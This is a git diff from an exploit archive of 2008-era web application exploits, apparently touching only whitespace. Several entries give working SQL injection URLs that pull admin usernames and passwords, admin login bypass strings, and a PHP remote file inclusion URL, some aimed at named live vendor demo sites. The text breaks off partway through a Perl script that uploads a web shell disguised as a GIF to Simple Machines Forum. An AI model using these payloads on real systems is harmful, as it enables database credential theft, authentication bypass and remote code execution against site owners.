--- a/platforms/php/webapps/7002.txt
+++ b/platforms/php/webapps/7002.txt
@@ -1,43 +1,43 @@
-======================================================================================================================================
-
-
- [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability
-
- Software : com_dadamail version 2.6
- Vendor : http://joomlander.net
- Download : http://joomlacode.org/gf/project/dadamailmanager/frs
- Author : NoGe
- Contact : noge[dot]code[at]gmail[dot]com
- Blog : http://evilc0de.blogspot.com
-
-
-======================================================================================================================================
-
-
- [o] Vulnerable file
-
- administrator/components/com_dadamail/config.dadamail.php
-
- require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');
-
-
-
- [o] Exploit
-
- http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-
-
-======================================================================================================================================
-
-
- [o] Greetz
-
- MainHack BrotherHood [ http://serverisdown.org/blog/]
- Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
- H312Y yooogy mousekill }^-^{ kaka11 martfella
- skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-
-======================================================================================================================================
-
-# milw0rm.com [2008-11-05]
+======================================================================================================================================
+
+
+ [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability
+
+ Software : com_dadamail version 2.6
+ Vendor : http://joomlander.net
+ Download : http://joomlacode.org/gf/project/dadamailmanager/frs
+ Author : NoGe
+ Contact : noge[dot]code[at]gmail[dot]com
+ Blog : http://evilc0de.blogspot.com
+
+
+======================================================================================================================================
+
+
+ [o] Vulnerable file
+
+ administrator/components/com_dadamail/config.dadamail.php
+
+ require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');
+
+
+
+ [o] Exploit
+
+ http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+
+
+======================================================================================================================================
+
+
+ [o] Greetz
+
+ MainHack BrotherHood [ http://serverisdown.org/blog/]
+ Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+ H312Y yooogy mousekill }^-^{ kaka11 martfella
+ skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+
+======================================================================================================================================
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7003.txt b/platforms/php/webapps/7003.txt
index 7437232bc..487c79956 100755
--- a/platforms/php/webapps/7003.txt
+++ b/platforms/php/webapps/7003.txt
@@ -1,41 +1,41 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- IN THE NAME OF ALLAH
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-PHP Auto Listings (moreinfo.php pg) SQL Injection Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-[~] Script: PHP Auto Listings Script
-[~] Language : PHP
-[~] Website[0]: http://preproject.com/projectDetail.asp?projectID=226
-[~] Website[1]: http://www.hotscripts.com/Detailed/71197.html
-[~] Type : Commercial
-[~] Report-Date : 06/11/2008
-[~] Founder : G4N0K
-
-===============================================================================
-
-===[ SQL ]===
-[!] http://localhost/[path]/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
-
-
-===[ LIVE ]===
-[+] http://www.preproject.com/abc/carlister/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
-
-
-
-
-
-===[ Greetz ]===
-[~] ALLAH
-[~] Tornado2800
-[~] Hussain-X
-
-//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-//ALLAH,forgimme...
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-exit(); //EoX
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-11-05]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+ IN THE NAME OF ALLAH
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+PHP Auto Listings (moreinfo.php pg) SQL Injection Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+[~] Script: PHP Auto Listings Script
+[~] Language : PHP
+[~] Website[0]: http://preproject.com/projectDetail.asp?projectID=226
+[~] Website[1]: http://www.hotscripts.com/Detailed/71197.html
+[~] Type : Commercial
+[~] Report-Date : 06/11/2008
+[~] Founder : G4N0K
+
+===============================================================================
+
+===[ SQL ]===
+[!] http://localhost/[path]/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
+
+
+===[ LIVE ]===
+[+] http://www.preproject.com/abc/carlister/moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
+
+
+
+
+
+===[ Greetz ]===
+[~] ALLAH
+[~] Tornado2800
+[~] Hussain-X
+
+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7004.txt b/platforms/php/webapps/7004.txt
index 17d5eb0df..0cae3c623 100755
--- a/platforms/php/webapps/7004.txt
+++ b/platforms/php/webapps/7004.txt
@@ -1,35 +1,35 @@
- Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home : www.IQ-TY.com & www.TrYaG.cc
-
-MaiL : darkangeL_G85@Yahoo.CoM
-___________________________________
-
-script : http://www.preproject.com/projectDetail.asp?projectID=240
-
-_____
-
-ExploiT
-_______
-
-http://www.uaebis.com/cms/siteadmin/adminlogin.php
-
-exploit > Bypass
-______________
-
-user : admin ' or ' 1=1
-pass: hussin-X
-
-
-
-
-
-Greetz : All my freind
-
-
- Im IraQi | Im TrYaGi
-
-# milw0rm.com [2008-11-05]
+ Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home : www.IQ-TY.com & www.TrYaG.cc
+
+MaiL : darkangeL_G85@Yahoo.CoM
+___________________________________
+
+script : http://www.preproject.com/projectDetail.asp?projectID=240
+
+_____
+
+ExploiT
+_______
+
+http://www.uaebis.com/cms/siteadmin/adminlogin.php
+
+exploit > Bypass
+______________
+
+user : admin ' or ' 1=1
+pass: hussin-X
+
+
+
+
+
+Greetz : All my freind
+
+
+ Im IraQi | Im TrYaGi
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7005.txt b/platforms/php/webapps/7005.txt
index 50b4c2508..39ae01cc6 100755
--- a/platforms/php/webapps/7005.txt
+++ b/platforms/php/webapps/7005.txt
@@ -1,62 +1,62 @@
-*********************************************************************************************
-[!] [!]
-[!] OOOO O OOOOOOOOO [!]
-[!]O O O O O [!]
-[!]O O O [!]
-[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
-[!]O OOO OOO O O O O OO O O O O OO O O O [!]
-[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
-[!]O O OOOO O O O O O O O O O O O [!]
-[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
-[!] OO [!]
-[!] OO [!]
-[!] OO Proud To Be MoroCCaN [!]
-[!] OO [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-= Pre Job Board Pro (id) Remote Admin Bypass Vulnerability =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--= Discovred By : Cyber-Zone =-
--= =-
--= E-mail : paradis_des_fous@hotmail.fr =-
--= =-
--= Home : WwW.IQ-Ty.CoM =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://preproject.com
-
-
-Bypass :
-
-Go To Admin Panel :
-
-Login With this information :
-
-Admin : admin ' or ' 1=1
-pass : Cyber-Zone or any thing
-
-Leged in :)
-
-Live demo :
-
-http://preproject.com/jobdemo/siteadmin/index.php
-
-EnjoY
-
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--= Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord =-
--= =-
--= The_5pectrum , (JIKO) No-Exploit =-
--= =-
--= Oujda SeCurity TeaM =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-05]
+*********************************************************************************************
+[!] [!]
+[!] OOOO O OOOOOOOOO [!]
+[!]O O O O O [!]
+[!]O O O [!]
+[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
+[!]O OOO OOO O O O O OO O O O O OO O O O [!]
+[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
+[!]O O OOOO O O O O O O O O O O O [!]
+[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
+[!] OO [!]
+[!] OO [!]
+[!] OO Proud To Be MoroCCaN [!]
+[!] OO [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+= Pre Job Board Pro (id) Remote Admin Bypass Vulnerability =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-= Discovred By : Cyber-Zone =-
+-= =-
+-= E-mail : paradis_des_fous@hotmail.fr =-
+-= =-
+-= Home : WwW.IQ-Ty.CoM =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://preproject.com
+
+
+Bypass :
+
+Go To Admin Panel :
+
+Login With this information :
+
+Admin : admin ' or ' 1=1
+pass : Cyber-Zone or any thing
+
+Leged in :)
+
+Live demo :
+
+http://preproject.com/jobdemo/siteadmin/index.php
+
+EnjoY
+
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-= Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord =-
+-= =-
+-= The_5pectrum , (JIKO) No-Exploit =-
+-= =-
+-= Oujda SeCurity TeaM =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7007.txt b/platforms/php/webapps/7007.txt
index c77cc3044..78fe58ea9 100755
--- a/platforms/php/webapps/7007.txt
+++ b/platforms/php/webapps/7007.txt
@@ -1,26 +1,26 @@
-===========================================
-Drinks script.
---------------------------------------------------------------------------------------
-Vendor: http://www.fivedollarscripts.com
-Demo: http://www.fivedollarscripts.com/drinks/index.php
-Notified: No. Probably don't care.
-Price: Five bones.
-============================================
-
-Exploit:
-/path/index.php?cmd=6&recid=null union all select
-1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
-drinksadmin--
-
-Live Demo:
-http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
-union all select
-1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
-drinksadmin--
-
-contact: x.s7acy at gmail dot com
-greetings to bobthejanitor, mason, that new president guy, and the rest.
-first script blah blah blah
-=============================================
-
-# milw0rm.com [2008-11-05]
+===========================================
+Drinks script.
+--------------------------------------------------------------------------------------
+Vendor: http://www.fivedollarscripts.com
+Demo: http://www.fivedollarscripts.com/drinks/index.php
+Notified: No. Probably don't care.
+Price: Five bones.
+============================================
+
+Exploit:
+/path/index.php?cmd=6&recid=null union all select
+1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
+drinksadmin--
+
+Live Demo:
+http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
+union all select
+1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
+drinksadmin--
+
+contact: x.s7acy at gmail dot com
+greetings to bobthejanitor, mason, that new president guy, and the rest.
+first script blah blah blah
+=============================================
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7008.txt b/platforms/php/webapps/7008.txt
index 16f758177..90c18c34b 100755
--- a/platforms/php/webapps/7008.txt
+++ b/platforms/php/webapps/7008.txt
@@ -1,62 +1,62 @@
-*********************************************************************************************
-[!] [!]
-[!] OOOO O OOOOOOOOO [!]
-[!]O O O O O [!]
-[!]O O O [!]
-[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
-[!]O OOO OOO O O O O OO O O O O OO O O O [!]
-[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
-[!]O O OOOO O O O O O O O O O O O [!]
-[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
-[!] OO [!]
-[!] OO [!]
-[!] OO Proud To Be MoroCCaN [!]
-[!] OO [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-= Pre Real Estate Listings Remote Admin Bypass Vulnerability =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--= Discovred By : Cyber-Zone =-
--= =-
--= E-mail : paradis_des_fous@hotmail.fr =-
--= =-
--= Home : WwW.IQ-Ty.CoM =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://preproject.com
-
-
-Bypass :
-
-Go To Admin Panel :
-
-Login With this information :
-
-Admin : admin ' or ' 1=1
-pass : Cyber-Zone or any thing
-
-Loged in :)
-
-Live demo :
-
-http://preproject.com/ulisting/manager/login.php
-
-EnjoY
-
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--= Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord =-
--= =-
--= The_5pectrum , 
(JIKO) No-Exploit =-
--= =-
--= Oujda SeCurity TeaM =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-05]
+*********************************************************************************************
+[!] [!]
+[!] OOOO O OOOOOOOOO [!]
+[!]O O O O O [!]
+[!]O O O [!]
+[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
+[!]O OOO OOO O O O O OO O O O O OO O O O [!]
+[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
+[!]O O OOOO O O O O O O O O O O O [!]
+[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
+[!] OO [!]
+[!] OO [!]
+[!] OO Proud To Be MoroCCaN [!]
+[!] OO [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+= Pre Real Estate Listings Remote Admin Bypass Vulnerability =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-= Discovred By : Cyber-Zone =-
+-= =-
+-= E-mail : paradis_des_fous@hotmail.fr =-
+-= =-
+-= Home : WwW.IQ-Ty.CoM =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://preproject.com
+
+
+Bypass :
+
+Go To Admin Panel :
+
+Login With this information :
+
+Admin : admin ' or ' 1=1
+pass : Cyber-Zone or any thing
+
+Loged in :)
+
+Live demo :
+
+http://preproject.com/ulisting/manager/login.php
+
+EnjoY
+
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-= Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord =-
+-= =-
+-= The_5pectrum , (JIKO) No-Exploit =-
+-= =-
+-= Oujda SeCurity TeaM =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7009.txt b/platforms/php/webapps/7009.txt
index 3352b99e1..1cba7fdf0 100755
--- a/platforms/php/webapps/7009.txt
+++ b/platforms/php/webapps/7009.txt
@@ -1,59 +1,58 @@
-
- || || | ||
- o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
- ( : / (_) / ( .
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-| _ __ __ __ ______ |
-| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
-| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
-| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
-| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
-| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
-| \ \____/ >> Kings of injection |
-| \/___/ |
-| |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by : Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com
-
-<> Groups : InjEctOr5 T3am
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script : mole-group Airline Ticket Script
-
-<<->> script demo : www.mole-group.com/content/view/57/72
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk : find it
-
-<<->> Exploit :>>>
-
- >>>> http://airline.mole-group.com/info.php?flight=[sql]
-
- ex >>>> http://airline.mole-group.com/info.php?flight=-60'+union+select+convert(user()+using+latin1),0,0,0,0,0,0,0,0,0,0,0,0/*
-
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-05]
+ || || | ||
+ o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
+ ( : / (_) / ( .
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+| _ __ __ __ ______ |
+| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
+| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
+| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
+| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
+| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
+| \ \____/ >> Kings of injection |
+| \/___/ |
+| |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by : Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com
+
+<> Groups : InjEctOr5 T3am
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script : mole-group Airline Ticket Script
+
+<<->> script demo : www.mole-group.com/content/view/57/72
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk : find it
+
+<<->> Exploit :>>>
+
+ >>>> http://airline.mole-group.com/info.php?flight=[sql]
+
+ ex >>>> http://airline.mole-group.com/info.php?flight=-60'+union+select+convert(user()+using+latin1),0,0,0,0,0,0,0,0,0,0,0,0/*
+
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7010.txt b/platforms/php/webapps/7010.txt
index 4dfa6e888..e7ec996eb 100755
--- a/platforms/php/webapps/7010.txt
+++ b/platforms/php/webapps/7010.txt
@@ -1,65 +1,64 @@
-
- || || | ||
- o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
- ( : / (_) / ( .
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-| _ __ __ __ ______ |
-| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
-| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
-| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
-| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
-| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
-| \ \____/ >> Kings of injection |
-| \/___/ |
-| |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by : Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com
-
-<> Groups : InjEctOr5 T3am
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script : mole-group Taxi Calc Dist Script
-
-<<->> script demo : www.mole-group.com/content/view/59/74
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk : find it
-
-<<->> Exploit :>>>
-
- >>>> http://taxicalc.mole-group.com/login.php
-
- >>>> Bypass
-
- >>>> http://taxicalc.mole-group.com/login.php
-
- >>> user : cyb3r-1st ' or ' 1=1--
-
- >>> pass : cyb3r-1st
-
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-05]
+ || || | ||
+ o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
+ ( : / (_) / ( .
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+| _ __ __ __ ______ |
+| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
+| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
+| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
+| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
+| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
+| \ \____/ >> Kings of injection |
+| \/___/ |
+| |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by : Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com
+
+<> Groups : InjEctOr5 T3am
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script : mole-group Taxi Calc Dist Script
+
+<<->> script demo : www.mole-group.com/content/view/59/74
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk : find it
+
+<<->> Exploit :>>>
+
+ >>>> http://taxicalc.mole-group.com/login.php
+
+ >>>> Bypass
+
+ >>>> http://taxicalc.mole-group.com/login.php
+
+ >>> user : cyb3r-1st ' or ' 1=1--
+
+ >>> pass : cyb3r-1st
+
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7011.pl b/platforms/php/webapps/7011.pl
index b1fbede18..c80b43995 100755
--- a/platforms/php/webapps/7011.pl
+++ b/platforms/php/webapps/7011.pl
@@ -1,284 +1,284 @@
-#!/usr/bin/perl
-#
-# @title: Simple Machines Forum Code Execution
-# @versn: * <= 1.1.6
-# @authr: ~elmysterio ( a.k.a us )
-# @stats: DROPPED!!!!!!!
-# @descp: In loving memory of the rare bone marrow disease that killed rgod.
-# We can't thank you enough for killing a bug killer.
-# @bug : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off
-# @gr33t: m0rt's failure, it never stops.
-#
-# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
-# -s http://localhost/audit/smf116 -u regular -p test -d
-# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
-# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
-# [ii] User Id = 2
-# [ii] Uploaded a shell...
-# [cmd@win32]$ ver
-#
-# Microsoft Windows XP [Version 5.1.2600]
-#
-# [cmd@win32]$
-#
-# FOR LULZ PURPOSE ONLY!!
-#
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-use Getopt::Long qw(:config no_ignore_case);
-
-print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";
-
-my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
-my %parms = ( s => "",
- d => 0,
- x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
- u => "Gl0ria!!!",
- p => "gl0ria\@herb3st" );
-
-GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";
-
-if( !$parms{s} ) {
- die <
- [-s] Site -> http://site.com/forums
- [-x] Proxy -> localhost:8118
- [-u] Username -> Gl0ria!!!
- [-p] Password -> gl0ria\@herb3st
- [-d] Debug
-HELP
-}
-
-my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
- chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
- chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
- chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
- chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
- chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
- chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
- chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
- chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
- chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
